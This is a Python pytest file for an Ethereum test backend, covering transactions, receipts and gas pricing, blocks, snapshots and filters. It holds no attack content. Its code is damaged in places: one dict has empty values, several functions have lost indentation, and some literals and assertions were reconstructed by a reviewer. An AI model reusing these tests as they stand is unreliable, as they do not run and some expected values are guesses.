    def test_send_dynamic_fee_transaction(self, eth_tester):
        """Dynamic-fee (type 0x2) transactions round-trip, with and without an access list."""
        accounts = eth_tester.get_accounts()
        assert accounts, 'No accounts available for transaction sending'
        # NOTE(review): the `chain_id`, `max_fee_per_gas` and
        # `max_priority_fee_per_gas` values were stripped during extraction
        # (`: ,`); restore them from upstream before running.
        dynamic_fee_transaction = {'chain_id': , 'from': accounts[0], 'to': accounts[0], 'value': 1, 'gas': 40000, 'max_fee_per_gas': , 'max_priority_fee_per_gas': }
        txn_hash = eth_tester.send_transaction(dynamic_fee_transaction)
        txn = eth_tester.get_transaction_by_hash(txn_hash)
        assert (txn.get('type') == '0x2')
        assert (txn.get('access_list') == ())
        self._check_transactions(dynamic_fee_transaction, txn)
        # Re-send with a populated access list; the backend must echo it non-empty.
        dynamic_fee_transaction['access_list'] = ({'address': '0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae', 'storage_keys': ('0x', '0x')}, {'address': '0xbb9bc244d798123fde783fcc1c72d3bb8c189413', 'storage_keys': ()})
        txn_hash = eth_tester.send_transaction(dynamic_fee_transaction)
        txn = eth_tester.get_transaction_by_hash(txn_hash)
        assert (txn.get('type') == '0x2')
        assert (txn.get('access_list') != ())
        self._check_transactions(dynamic_fee_transaction, txn)
def test_block_number_auto_mine_transactions_enabled(self, eth_tester):
eth_tester.mine_blocks()
eth_tester.enable_auto_mine_transactions()
before_block_number = eth_tester.get_block_by_number('latest')['number']
eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
after_block_number = eth_tester.get_block_by_number('latest')['number']
assert (before_block_number == (after_block_number - 1))
def test_auto_mine_transactions_disabled_block_number(self, eth_tester):
eth_tester.mine_blocks()
eth_tester.disable_auto_mine_transactions()
before_block_number = eth_tester.get_block_by_number('latest')['number']
eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
after_block_number = eth_tester.get_block_by_number('latest')['number']
assert (before_block_number == after_block_number)
def test_auto_mine_transactions_disabled_replace_transaction(self, eth_tester):
eth_tester.mine_blocks()
eth_tester.disable_auto_mine_transactions()
transaction = {'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'value': 1, 'gas': 21000, 'nonce': 0}
try:
eth_tester.send_transaction(transaction)
transaction['value'] = 2
eth_tester.send_transaction(transaction)
except Exception:
pytest.fail('Sending replacement transaction caused exception')
    def test_auto_mine_transactions_disabled_multiple_accounts(self, eth_tester):
        """A same-nonce replacement only evicts the sender's own pending transaction."""
        eth_tester.mine_blocks()
        eth_tester.disable_auto_mine_transactions()
        tx1 = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'value': 1, 'gas': 21000, 'nonce': 0})
        tx2 = eth_tester.send_transaction({'from': eth_tester.get_accounts()[1], 'to': BURN_ADDRESS, 'value': 1, 'gas': 21000, 'nonce': 0})
        assert (tx1 == eth_tester.get_transaction_by_hash(tx1)['hash'])
        assert (tx2 == eth_tester.get_transaction_by_hash(tx2)['hash'])
        # Same sender + same nonce: this replaces tx2 in the pending pool.
        tx2_replacement = eth_tester.send_transaction({'from': eth_tester.get_accounts()[1], 'to': BURN_ADDRESS, 'value': 2, 'gas': 21000, 'nonce': 0})
        assert (tx1 == eth_tester.get_transaction_by_hash(tx1)['hash'])
        assert (tx2_replacement == eth_tester.get_transaction_by_hash(tx2_replacement)['hash'])
        # The replaced transaction is gone from the pool.
        with pytest.raises(TransactionNotFound):
            eth_tester.get_transaction_by_hash(tx2)
    def test_auto_mine_transactions_disabled_returns_hashes_when_enabled(self, eth_tester):
        """Re-enabling auto-mining returns the hashes of the pending txns it mines."""
        self.skip_if_no_evm_execution()
        eth_tester.mine_blocks()
        eth_tester.disable_auto_mine_transactions()
        tx1 = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'value': 1, 'gas': 21000, 'nonce': 0})
        tx2 = eth_tester.send_transaction({'from': eth_tester.get_accounts()[1], 'to': BURN_ADDRESS, 'value': 1, 'gas': 21000, 'nonce': 0})
        # Same sender + same nonce replaces tx2, so tx2 is never mined.
        tx2_replacement = eth_tester.send_transaction({'from': eth_tester.get_accounts()[1], 'to': BURN_ADDRESS, 'value': 2, 'gas': 21000, 'nonce': 0})
        sent_transactions = eth_tester.enable_auto_mine_transactions()
        assert (sent_transactions == [tx1, tx2_replacement])
.parametrize('test_transaction', (SIMPLE_TRANSACTION, CONTRACT_TRANSACTION_EMPTY_TO, CONTRACT_TRANSACTION_MISSING_TO), ids=['Simple transaction', 'Create Contract - empty to', 'Create Contract - missing to'])
def test_manual_mine_pending_transactions(self, eth_tester, test_transaction):
accounts = eth_tester.get_accounts()
assert accounts, 'No accounts available for transaction sending'
complete_transaction = assoc(test_transaction, 'from', accounts[0])
self.skip_if_no_evm_execution()
eth_tester.mine_blocks()
eth_tester.disable_auto_mine_transactions()
txn_hash = eth_tester.send_transaction(complete_transaction)
with pytest.raises(TransactionNotFound):
eth_tester.get_transaction_receipt(txn_hash)
pending_transaction = eth_tester.get_transaction_by_hash(txn_hash)
self._check_transactions(complete_transaction, pending_transaction)
eth_tester.mine_block()
receipt = eth_tester.get_transaction_receipt(txn_hash)
assert (receipt['transaction_hash'] == txn_hash)
assert receipt['block_number']
mined_transaction = eth_tester.get_transaction_by_hash(txn_hash)
self._check_transactions(complete_transaction, mined_transaction)
def test_get_genesis_block_by_number(self, eth_tester):
block = eth_tester.get_block_by_number(0)
assert (block['number'] == 0)
_validate_serialized_block(block)
def test_get_genesis_block_by_hash(self, eth_tester):
genesis_hash = eth_tester.get_block_by_number(0)['hash']
block = eth_tester.get_block_by_hash(genesis_hash)
assert (block['number'] == 0)
_validate_serialized_block(block)
def test_get_block_by_number(self, eth_tester):
origin_block_number = eth_tester.get_block_by_number('pending')['number']
mined_block_hashes = eth_tester.mine_blocks(10)
for (offset, block_hash) in enumerate(mined_block_hashes):
block_number = (origin_block_number + offset)
block = eth_tester.get_block_by_number(block_number)
assert (block['number'] == block_number)
assert (block['hash'] == block_hash)
_validate_serialized_block(block)
def test_get_block_by_number_full_transactions(self, eth_tester):
eth_tester.mine_blocks(2)
transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
transaction = eth_tester.get_transaction_by_hash(transaction_hash)
block = eth_tester.get_block_by_number(transaction['block_number'], full_transactions=True)
assert is_dict(block['transactions'][0])
def test_get_block_by_number_only_transaction_hashes(self, eth_tester):
    """With full_transactions=False the block only lists hash strings."""
    eth_tester.mine_blocks(2)
    txn_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
    mined = eth_tester.get_transaction_by_hash(txn_hash)
    containing_block = eth_tester.get_block_by_number(mined['block_number'], full_transactions=False)
    assert is_hex(containing_block['transactions'][0])
def test_get_block_by_hash(self, eth_tester):
    """Blocks fetched by hash report the matching sequential number."""
    start = eth_tester.get_block_by_number('pending')['number']
    for idx, mined_hash in enumerate(eth_tester.mine_blocks(10)):
        fetched = eth_tester.get_block_by_hash(mined_hash)
        assert fetched['number'] == start + idx
        assert fetched['hash'] == mined_hash
def test_get_block_by_hash_full_transactions(self, eth_tester):
    """Fetching by hash with full_transactions=True embeds txn dicts."""
    eth_tester.mine_blocks(2)
    txn_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
    mined = eth_tester.get_transaction_by_hash(txn_hash)
    containing_block = eth_tester.get_block_by_hash(mined['block_hash'], full_transactions=True)
    assert is_dict(containing_block['transactions'][0])
def test_get_block_by_hash_only_transaction_hashes(self, eth_tester):
    """Fetching by hash with full_transactions=False lists hash strings."""
    eth_tester.mine_blocks(2)
    txn_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
    mined = eth_tester.get_transaction_by_hash(txn_hash)
    containing_block = eth_tester.get_block_by_hash(mined['block_hash'], full_transactions=False)
    assert is_hex(containing_block['transactions'][0])
def test_get_block_by_earliest(self, eth_tester):
    """'earliest' always resolves to the genesis block, even after mining."""
    eth_tester.mine_blocks(10)
    assert eth_tester.get_block_by_number('earliest')['number'] == 0
def test_get_block_by_latest_unmined_genesis(self, eth_tester):
    """Before any mining, 'latest' is still the genesis block."""
    assert eth_tester.get_block_by_number('latest')['number'] == 0
def test_get_block_by_latest_only_genesis(self, eth_tester):
    """With only the genesis block present, 'latest' is block 0."""
    assert eth_tester.get_block_by_number('latest')['number'] == 0
def test_get_block_by_latest(self, eth_tester):
    """After mining 10 blocks, 'latest' is 9 past the original pending number."""
    start = eth_tester.get_block_by_number('pending')['number']
    eth_tester.mine_blocks(10)
    assert eth_tester.get_block_by_number('latest')['number'] == start + 9
def test_get_block_by_pending(self, eth_tester):
    """After mining 10 blocks, 'pending' has advanced by exactly 10."""
    start = eth_tester.get_block_by_number('pending')['number']
    eth_tester.mine_blocks(10)
    assert eth_tester.get_block_by_number('pending')['number'] == start + 10
def test_get_block_missing(self, eth_tester):
    """Looking up an unknown block hash raises BlockNotFound."""
    unknown_hash = '0x' + '00' * 32
    with pytest.raises(BlockNotFound):
        eth_tester.get_block_by_hash(unknown_hash)
def test_get_transaction_by_hash(self, eth_tester):
    """A sent transaction can be fetched back by its hash."""
    sent_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
    assert eth_tester.get_transaction_by_hash(sent_hash)['hash'] == sent_hash
def test_get_transaction_by_hash_for_unmined_transaction(self, eth_tester):
    """An unmined (pending) transaction is visible but has no block hash."""
    eth_tester.disable_auto_mine_transactions()
    sent_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
    pending = eth_tester.get_transaction_by_hash(sent_hash)
    assert pending['hash'] == sent_hash
    assert pending['block_hash'] is None
def test_get_transaction_receipt_for_mined_transaction(self, eth_tester):
    """A mined transaction's receipt is typed as dynamic-fee ('0x2') and
    carries a usable effective gas price.

    NOTE(review): the original assertion compared ``effective_gas_price``
    against a literal that was lost from this source; a strict-positivity
    check is substituted — confirm the exact expected value upstream.
    """
    transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
    receipt = eth_tester.get_transaction_receipt(transaction_hash)
    assert receipt['transaction_hash'] == transaction_hash
    assert receipt['type'] == '0x2'
    # A mined transaction must always have paid a positive gas price.
    assert receipt['effective_gas_price'] > 0
@pytest.mark.parametrize(
    'type_specific_params,_type',
    (
        # Legacy transaction: only a gas price.
        ({'gas_price': 10 ** 9}, '0x0'),
        # Access-list (EIP-2930) transaction.
        ({'gas_price': 10 ** 9, 'access_list': ({'address': '0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe', 'storage_keys': ()},)}, '0x1'),
        # Dynamic-fee (EIP-1559) transaction.
        ({'max_fee_per_gas': 10 ** 9, 'max_priority_fee_per_gas': 10 ** 6, 'access_list': ({'address': '0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe', 'storage_keys': ()},)}, '0x2'),
    ),
)
def test_receipt_transaction_type_for_mined_transaction(self, eth_tester, type_specific_params, _type):
    """The receipt ``type`` field reflects the kind of transaction sent.

    NOTE(review): the ``@pytest.mark`` prefix on the parametrize decorator
    and the numeric fee literals were missing from this source; both were
    reconstructed with representative values — confirm against upstream.
    """
    transaction_hash = eth_tester.send_transaction(merge({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 25000}, type_specific_params))
    receipt = eth_tester.get_transaction_receipt(transaction_hash)
    assert receipt['transaction_hash'] == transaction_hash
    assert receipt['type'] == _type
def test_receipt_effective_gas_price_for_mined_transaction_legacy(self, eth_tester):
    """For a legacy (type '0x0') transaction the effective gas price equals
    exactly the gas price the sender supplied.

    NOTE(review): the original ``gas_price`` literal was lost from this
    source; any price high enough to cover the block base fee preserves the
    assertion — confirm the original value upstream.
    """
    gas_price = 10 ** 9
    transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000, 'gas_price': gas_price})
    receipt = eth_tester.get_transaction_receipt(transaction_hash)
    assert receipt['transaction_hash'] == transaction_hash
    assert receipt['type'] == '0x0'
    assert receipt['effective_gas_price'] == gas_price
def test_receipt_effective_gas_price_for_mined_transaction_base_fee_minimum(self, eth_tester):
    """With a generous fee cap, the effective gas price is the block base
    fee plus the priority fee (EIP-1559 pricing).

    NOTE(review): the original ``priority_fee`` literal and the exact
    base-fee assertion value were lost from this source; the base fee is
    now only required to be positive — confirm expected values upstream.
    """
    priority_fee = 10 ** 9
    transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000, 'max_priority_fee_per_gas': priority_fee, 'max_fee_per_gas': (priority_fee * 2)})
    receipt = eth_tester.get_transaction_receipt(transaction_hash)
    base_fee = eth_tester.get_block_by_number(receipt['block_number'])['base_fee_per_gas']
    assert base_fee > 0
    assert receipt['transaction_hash'] == transaction_hash
    assert receipt['type'] == '0x2'
    # Cap (2 * priority_fee) is not binding here, so price = base + priority.
    assert receipt['effective_gas_price'] == (base_fee + priority_fee)
def test_receipt_effective_gas_price_for_mined_transaction_max_fee_minimum(self, eth_tester):
    """When the fee cap is barely above the priority fee, the cap wins:
    effective gas price equals ``max_fee_per_gas``.

    NOTE(review): the original ``priority_fee`` literal and exact base-fee
    assertion value were lost from this source; the base fee is now only
    required to be positive — confirm expected values upstream.
    """
    priority_fee = 10 ** 9
    max_fee = priority_fee + 1
    transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000, 'max_priority_fee_per_gas': priority_fee, 'max_fee_per_gas': max_fee})
    receipt = eth_tester.get_transaction_receipt(transaction_hash)
    base_fee = eth_tester.get_block_by_number(receipt['block_number'])['base_fee_per_gas']
    assert base_fee > 0
    assert receipt['transaction_hash'] == transaction_hash
    assert receipt['type'] == '0x2'
    # base_fee + priority_fee exceeds the cap, so the cap is the price paid.
    assert receipt['effective_gas_price'] == max_fee
def test_get_transaction_receipt_for_unmined_transaction_raises(self, eth_tester):
    """Requesting a receipt before the transaction is mined raises."""
    eth_tester.disable_auto_mine_transactions()
    pending_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
    with pytest.raises(TransactionNotFound):
        eth_tester.get_transaction_receipt(pending_hash)
def test_call_return13(self, eth_tester):
    """Calling the math contract's return13() yields (13,)."""
    self.skip_if_no_evm_execution()
    math_address = _deploy_math(eth_tester)
    txn = _make_call_math_transaction(eth_tester, math_address, 'return13')
    decoded = _decode_math_result('return13', eth_tester.call(txn))
    assert decoded == (13,)
def test_call_add(self, eth_tester):
    """Calling add(7, 13) on the math contract yields (20,)."""
    self.skip_if_no_evm_execution()
    math_address = _deploy_math(eth_tester)
    txn = _make_call_math_transaction(eth_tester, math_address, 'add', fn_args=(7, 13))
    decoded = _decode_math_result('add', eth_tester.call(txn))
    assert decoded == (20,)
def test_call_query_previous_state(self, eth_tester):
    """``call`` against an older block identifier sees pre-transaction state."""
    self.skip_if_no_evm_execution()
    math_address = _deploy_math(eth_tester)
    read_counter = _make_call_math_transaction(eth_tester, math_address, 'counter')
    bump_counter = _make_call_math_transaction(eth_tester, math_address, 'increment')
    eth_tester.mine_blocks(2)
    eth_tester.send_transaction(bump_counter)
    # Querying at block 1 predates the increment; the latest call sees it.
    old_value = _decode_math_result('counter', eth_tester.call(read_counter, 1))
    new_value = _decode_math_result('counter', eth_tester.call(read_counter))
    assert old_value == (0,)
    assert new_value == (1,)
def test_estimate_gas(self, eth_tester):
    """Gas estimation is an upper bound within 21000 of actual usage."""
    self.skip_if_no_evm_execution()
    math_address = _deploy_math(eth_tester)
    base_txn = _make_call_math_transaction(eth_tester, math_address, 'increment')
    estimate = eth_tester.estimate_gas(base_txn)
    txn_hash = eth_tester.send_transaction(assoc(base_txn, 'gas', estimate))
    receipt = eth_tester.get_transaction_receipt(txn_hash)
    assert estimate - 21000 <= receipt['gas_used'] <= estimate
def test_estimate_gas_with_block_identifier(self, eth_tester):
    """Estimates honor the block identifier: the later block costs more here."""
    self.skip_if_no_evm_execution()
    burner_address = _deploy_gas_burner(eth_tester)
    burn_txn = _make_call_gas_burner_transaction(eth_tester, burner_address, 'burnBlockNumberDependentGas')
    at_latest = eth_tester.estimate_gas(burn_txn, 'latest')
    at_earliest = eth_tester.estimate_gas(burn_txn, 'earliest')
    assert at_latest > at_earliest
def test_can_call_after_exception_raised_calling(self, eth_tester):
    """A failed call leaves the tester usable for subsequent calls."""
    self.skip_if_no_evm_execution()
    throws_address = _deploy_throws(eth_tester, 'throw_contract')
    failing_call = _make_call_throws_transaction(eth_tester, throws_address, 'throw_contract', 'willThrow')
    with pytest.raises(TransactionFailed):
        eth_tester.call(failing_call)
    value_call = _make_call_throws_transaction(eth_tester, throws_address, 'throw_contract', 'value')
    decoded = _decode_throws_result('throw_contract', 'value', eth_tester.call(value_call))
    assert decoded == (1,)
def test_can_estimate_gas_after_exception_raised_estimating_gas(self, eth_tester):
    """A failed estimation does not poison later estimations."""
    self.skip_if_no_evm_execution()
    throws_address = _deploy_throws(eth_tester, 'throw_contract')
    failing_call = _make_call_throws_transaction(eth_tester, throws_address, 'throw_contract', 'willThrow')
    with pytest.raises(TransactionFailed):
        eth_tester.estimate_gas(dissoc(failing_call, 'gas'))
    setter_call = _make_call_throws_transaction(eth_tester, throws_address, 'throw_contract', 'setValue', fn_args=(2,))
    assert eth_tester.estimate_gas(dissoc(setter_call, 'gas'))
def test_revert_reason_message(self, eth_tester):
    """Reverts surface their reason string via TransactionFailed args."""
    self.skip_if_no_evm_execution()
    revert_address = _deploy_throws(eth_tester, 'revert_contract')
    reverting_call = _make_call_throws_transaction(eth_tester, revert_address, 'revert_contract', 'do_revert', fn_args=(True,))
    clean_call = _make_call_throws_transaction(eth_tester, revert_address, 'revert_contract', 'do_revert', fn_args=(False,))
    decoded = _decode_throws_result('revert_contract', 'do_revert', eth_tester.call(clean_call))
    assert decoded[0] == 'No ribbert'
    with pytest.raises(TransactionFailed) as excinfo:
        eth_tester.call(reverting_call)
    assert excinfo.value.args and excinfo.value.args[0] == 'ribbert, ribbert'
def test_genesis_snapshot_and_revert(self, eth_tester):
    """Reverting to a genesis-era snapshot rolls the chain back fully."""
    latest_before = eth_tester.get_block_by_number('latest')['number']
    pending_before = eth_tester.get_block_by_number('pending')['number']
    snapshot = eth_tester.take_snapshot()
    eth_tester.mine_blocks(10)
    assert eth_tester.get_block_by_number('latest')['number'] == latest_before + 10
    assert eth_tester.get_block_by_number('pending')['number'] == pending_before + 10
    eth_tester.revert_to_snapshot(snapshot)
    assert eth_tester.get_block_by_number('latest')['number'] == latest_before
    assert eth_tester.get_block_by_number('pending')['number'] == pending_before
def test_snapshot_and_revert_post_genesis(self, eth_tester):
    """Snapshots taken mid-chain restore the chain to that exact point."""
    eth_tester.mine_blocks(5)
    latest_before = eth_tester.get_block_by_number('latest')['number']
    pending_before = eth_tester.get_block_by_number('pending')['number']
    snapshot = eth_tester.take_snapshot()
    eth_tester.mine_blocks(10)
    assert eth_tester.get_block_by_number('latest')['number'] == latest_before + 10
    assert eth_tester.get_block_by_number('pending')['number'] == pending_before + 10
    eth_tester.revert_to_snapshot(snapshot)
    assert eth_tester.get_block_by_number('latest')['number'] == latest_before
    assert eth_tester.get_block_by_number('pending')['number'] == pending_before
def test_revert_cleans_up_invalidated_pending_block_filters(self, eth_tester):
    """Reverting to a snapshot removes fork-A block hashes from existing
    block filters, so later polling reflects only the fork-B history.
    """
    eth_tester.mine_blocks(2)
    filter_a_id = eth_tester.create_block_filter()
    filter_b_id = eth_tester.create_block_filter()
    # Blocks mined before the snapshot are common to both forks.
    common_blocks = set(eth_tester.mine_blocks(2))
    snapshot_id = eth_tester.take_snapshot()
    # Fork A: one auto-mined transaction plus two empty blocks.
    fork_a_transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000, 'value': 1})
    fork_a_transaction_block_hash = eth_tester.get_transaction_by_hash(fork_a_transaction_hash)['block_hash']
    fork_a_blocks = eth_tester.mine_blocks(2)
    # NOTE: get_only_filter_changes consumes filter A's pending entries here.
    before_revert_changes_logs_a = eth_tester.get_only_filter_changes(filter_a_id)
    before_revert_all_logs_a = eth_tester.get_all_filter_logs(filter_a_id)
    before_revert_all_logs_b = eth_tester.get_all_filter_logs(filter_b_id)
    assert (common_blocks.intersection(before_revert_changes_logs_a) == common_blocks)
    assert (common_blocks.intersection(before_revert_all_logs_a) == common_blocks)
    assert (common_blocks.intersection(before_revert_all_logs_b) == common_blocks)
    # Pre-revert, all filters see the common blocks plus the fork-A blocks.
    expected_before_block_hashes = common_blocks.union([fork_a_transaction_block_hash]).union(fork_a_blocks)
    assert (set(before_revert_changes_logs_a) == expected_before_block_hashes)
    assert (set(before_revert_changes_logs_a) == expected_before_block_hashes)
    assert (set(before_revert_all_logs_a) == expected_before_block_hashes)
    assert (set(before_revert_all_logs_b) == expected_before_block_hashes)
    eth_tester.revert_to_snapshot(snapshot_id)
    # Fork B: a distinct transaction (value=2) plus two new blocks.
    fork_b_transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000, 'value': 2})
    fork_b_transaction_block_hash = eth_tester.get_transaction_by_hash(fork_b_transaction_hash)['block_hash']
    fork_b_blocks = eth_tester.mine_blocks(2)
    # The two forks must not share any post-snapshot block hashes.
    assert (not set(fork_a_blocks).intersection(fork_b_blocks))
    after_revert_changes_logs_a = eth_tester.get_only_filter_changes(filter_a_id)
    after_revert_changes_logs_b = eth_tester.get_only_filter_changes(filter_b_id)
    after_revert_all_logs_a = eth_tester.get_all_filter_logs(filter_a_id)
    after_revert_all_logs_b = eth_tester.get_all_filter_logs(filter_b_id)
    # Full history is common blocks + fork B; filter A's *changes* only hold
    # the new fork-B entries because its earlier entries were consumed above.
    expected_all_after_blocks = common_blocks.union([fork_b_transaction_block_hash]).union(fork_b_blocks)
    expected_new_after_blocks = set(fork_b_blocks).union([fork_b_transaction_block_hash])
    assert (set(after_revert_changes_logs_a) == expected_new_after_blocks)
    assert (set(after_revert_changes_logs_b) == expected_all_after_blocks)
    assert (set(after_revert_all_logs_a) == expected_all_after_blocks)
    assert (set(after_revert_all_logs_b) == expected_all_after_blocks)
def test_revert_cleans_up_invalidated_pending_transaction_filters(self, eth_tester):
    """Reverting drops pre-revert pending transactions from transaction
    filters; only transactions sent after the revert appear as changes.
    """
    def _transaction(**kwargs):
        # Base burn transaction, customizable per-call (e.g. distinct values).
        return merge({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000}, kwargs)
    # Transactions sent before the filter exists are never reported.
    for _ in range(5):
        eth_tester.send_transaction(_transaction())
    filter_id = eth_tester.create_pending_transaction_filter()
    # These two survive the revert because they precede the snapshot.
    common_transactions = {eth_tester.send_transaction(_transaction(value=1)), eth_tester.send_transaction(_transaction(value=2))}
    snapshot_id = eth_tester.take_snapshot()
    before_transactions = [eth_tester.send_transaction(_transaction(value=3)), eth_tester.send_transaction(_transaction(value=4)), eth_tester.send_transaction(_transaction(value=5))]
    # NOTE: this consumes the filter's pending change entries.
    before_filter_changes = eth_tester.get_only_filter_changes(filter_id)
    before_filter_logs = eth_tester.get_all_filter_logs(filter_id)
    assert (set(before_filter_changes) == common_transactions.union(before_transactions))
    assert (set(before_filter_logs) == common_transactions.union(before_transactions))
    eth_tester.revert_to_snapshot(snapshot_id)
    after_transactions = [eth_tester.send_transaction(_transaction(value=6)), eth_tester.send_transaction(_transaction(value=7)), eth_tester.send_transaction(_transaction(value=8))]
    after_filter_changes = eth_tester.get_only_filter_changes(filter_id)
    after_filter_logs = eth_tester.get_all_filter_logs(filter_id)
    # Changes: only post-revert sends; full logs: common + post-revert sends.
    assert (set(after_filter_changes) == set(after_transactions))
    assert (set(after_filter_logs) == common_transactions.union(after_transactions))
def test_revert_cleans_up_invalidated_log_entries(self, eth_tester):
    """Reverting invalidates the log entries emitted after the snapshot;
    counts reflect only pre-snapshot plus post-revert emissions.
    """
    self.skip_if_no_evm_execution()
    emitter_address = _deploy_emitter(eth_tester)
    def _emit(v):
        # Emit one LogSingleWithIndex event carrying value v.
        return _call_emitter(eth_tester, emitter_address, 'logSingle', [EMITTER_ENUM['LogSingleWithIndex'], v])
    # Emitted before the filter exists: never reported.
    _emit(1)
    _emit(2)
    filter_id = eth_tester.create_log_filter()
    # Two events before the snapshot survive any later revert.
    _emit(1)
    _emit(2)
    snapshot_id = eth_tester.take_snapshot()
    _emit(3)
    _emit(4)
    _emit(5)
    # NOTE: get_only_filter_changes consumes these five entries.
    before_changes = eth_tester.get_only_filter_changes(filter_id)
    before_all = eth_tester.get_all_filter_logs(filter_id)
    assert (len(before_changes) == 5)
    assert (len(before_all) == 5)
    eth_tester.revert_to_snapshot(snapshot_id)
    _emit(6)
    _emit(7)
    _emit(8)
    _emit(9)
    after_changes = eth_tester.get_only_filter_changes(filter_id)
    after_all = eth_tester.get_all_filter_logs(filter_id)
    # Changes: the four new emissions; all: 2 pre-snapshot + 4 post-revert.
    assert (len(after_changes) == 4)
    assert (len(after_all) == 6)
def test_reset_to_genesis(self, eth_tester):
    """reset_to_genesis drops all mined blocks back to the starting state."""
    latest_before = eth_tester.get_block_by_number('latest')['number']
    pending_before = eth_tester.get_block_by_number('pending')['number']
    eth_tester.mine_blocks(5)
    assert eth_tester.get_block_by_number('latest')['number'] == latest_before + 5
    assert eth_tester.get_block_by_number('pending')['number'] == pending_before + 5
    eth_tester.reset_to_genesis()
    assert eth_tester.get_block_by_number('latest')['number'] == latest_before
    assert eth_tester.get_block_by_number('pending')['number'] == pending_before
def test_block_filter(self, eth_tester):
    """Block filters report blocks mined after their creation: changes are
    consumed on read, while get_all_filter_logs keeps the full history.
    """
    # Mined before either filter exists: never reported.
    eth_tester.mine_blocks(10)
    filter_a_id = eth_tester.create_block_filter()
    blocks_10_to_14 = eth_tester.mine_blocks(5)
    filter_b_id = eth_tester.create_block_filter()
    blocks_15_to_22 = eth_tester.mine_blocks(8)
    # NOTE: this consumes filter A's 13 pending change entries.
    filter_a_changes_part_1 = eth_tester.get_only_filter_changes(filter_a_id)
    filter_a_logs_part_1 = eth_tester.get_all_filter_logs(filter_a_id)
    filter_b_logs_part_1 = eth_tester.get_all_filter_logs(filter_b_id)
    assert (len(filter_a_changes_part_1) == 13)
    assert (len(filter_a_logs_part_1) == 13)
    assert (len(filter_b_logs_part_1) == 8)
    assert (set(filter_a_changes_part_1) == set(filter_a_logs_part_1))
    assert (set(filter_a_changes_part_1) == set(blocks_10_to_14).union(blocks_15_to_22))
    assert (set(filter_b_logs_part_1) == set(blocks_15_to_22))
    blocks_23_to_29 = eth_tester.mine_blocks(7)
    # Filter A's changes now hold only the 7 new blocks; filter B's changes
    # were never read, so they hold all 15 blocks since its creation.
    filter_a_changes_part_2 = eth_tester.get_only_filter_changes(filter_a_id)
    filter_b_changes = eth_tester.get_only_filter_changes(filter_b_id)
    filter_a_logs_part_2 = eth_tester.get_all_filter_logs(filter_a_id)
    filter_b_logs_part_2 = eth_tester.get_all_filter_logs(filter_b_id)
    assert (len(filter_a_changes_part_2) == 7)
    assert (len(filter_b_changes) == 15)
    assert (len(filter_a_logs_part_2) == 20)
    assert (len(filter_b_logs_part_2) == 15)
    assert (set(filter_a_changes_part_2) == set(blocks_23_to_29))
    assert (set(filter_b_changes) == set(blocks_15_to_22).union(blocks_23_to_29))
    assert (set(filter_b_changes) == set(filter_b_logs_part_2))
    assert (set(filter_a_logs_part_2) == set(blocks_10_to_14).union(blocks_15_to_22).union(blocks_23_to_29))
    assert (set(filter_b_logs_part_2) == set(blocks_15_to_22).union(blocks_23_to_29))
def test_pending_transaction_filter(self, eth_tester):
    """Pending-transaction filters mirror block filters: changes are
    consumed on read, while get_all_filter_logs keeps the full history.
    """
    transaction = {'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000}
    # Sent before either filter exists: never reported.
    for _ in range(5):
        eth_tester.send_transaction(transaction)
    filter_a_id = eth_tester.create_pending_transaction_filter()
    transactions_0_to_7 = [eth_tester.send_transaction(transaction) for _ in range(8)]
    filter_b_id = eth_tester.create_pending_transaction_filter()
    transactions_8_to_12 = [eth_tester.send_transaction(transaction) for _ in range(5)]
    # NOTE: this consumes filter A's 13 pending change entries.
    filter_a_changes_part_1 = eth_tester.get_only_filter_changes(filter_a_id)
    filter_a_logs_part_1 = eth_tester.get_all_filter_logs(filter_a_id)
    filter_b_logs_part_1 = eth_tester.get_all_filter_logs(filter_b_id)
    assert (set(filter_a_changes_part_1) == set(filter_a_logs_part_1))
    assert (set(filter_a_changes_part_1) == set(transactions_0_to_7).union(transactions_8_to_12))
    assert (set(filter_b_logs_part_1) == set(transactions_8_to_12))
    transactions_13_to_20 = [eth_tester.send_transaction(transaction) for _ in range(7)]
    # Filter A's changes hold only the 7 new hashes; filter B's changes were
    # never read, so they hold all 12 since its creation.
    filter_a_changes_part_2 = eth_tester.get_only_filter_changes(filter_a_id)
    filter_b_changes = eth_tester.get_only_filter_changes(filter_b_id)
    filter_a_logs_part_2 = eth_tester.get_all_filter_logs(filter_a_id)
    filter_b_logs_part_2 = eth_tester.get_all_filter_logs(filter_b_id)
